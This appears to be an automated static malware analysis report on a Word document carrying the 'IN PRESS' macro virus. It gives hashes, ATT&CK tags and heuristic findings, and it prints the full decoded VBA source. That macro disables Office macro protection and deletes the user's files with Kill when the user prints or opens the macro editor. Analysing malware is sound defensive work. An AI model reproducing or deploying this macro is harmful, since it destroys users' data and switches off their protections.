Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 40b0db371fcec08e…

MALICIOUS

Office (OLE) / .DOC

28.0 KB Created: 2002-03-16 17:20:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: 8bd541c09563b61ba632bc887bfdbfac SHA-1: 4a098ac76122e255d675e7ec1a323577c1b14752 SHA-256: 40b0db371fcec08e332fe2d5216242dfc4ad407fce4291a37e6e76a4b36da930
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1490 Inhibit System Recovery

The sample contains a VBA macro that attempts to disable macro protection and delete files using `Kill("*.*")`. The macro also displays messages to the user, claiming to be a virus named 'IN PRESS'. This behavior indicates a destructive intent, aiming to cause data loss and disrupt the user's system.

Heuristics 2

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1898 bytes
SHA-256: 7f7eb68e0d8f6e58b16dfe181eece9f1ef31238fb83e989e4e39124822a21881
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "INPress"
Sub FilePrint()
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.EnableCancelKey = wdCancelDisabled
On Errore GoTo ErrorFS

adoc = Dir("*.*")
While adoc <> ""
    Kill (adoc)
    MsgBox "' " + adoc + " ' has been erased !", vbInformation, "IN PRESS"
    adoc = Dir()
Wend
Assistant.Visible = True
With Assistant.NewBalloon
    .Button = msoButtonSetOK
    .Heading = "Virus IN PRESS"
    .Text = "Ooops ! I have erased your documents .. I have to quit now . Bye bye and sweet dreams !!!"
    .Show
End With

Application.Quit

ErrorFS:

End Sub

Sub ToolsMacro()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorTM
    MsgBox "Sorry but you have been infected by IN PRESS !", vbInformation, "IN PRESS"
ErrorTM:

End Sub

Sub ViewVBCode()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorVVBC
Assistant.Visible = True
With Assistant.NewBalloon
    .Button = msoButtonSetOK
    .Heading = "Virus IN PRESS"
    .Text = "Why did you want to see my source ? You have done a bad thing !!"
    .Show
End With
Kill "\*.*"
Kill "*.*"

Assistant.Visible = True
With Assistant.NewBalloon
    .Button = msoButtonSetOK
    .Heading = "Virus IN PRESS"
    .Text = "I have erased your files to punish your!"
    .Show
End With

ErrorVVBC:
End Sub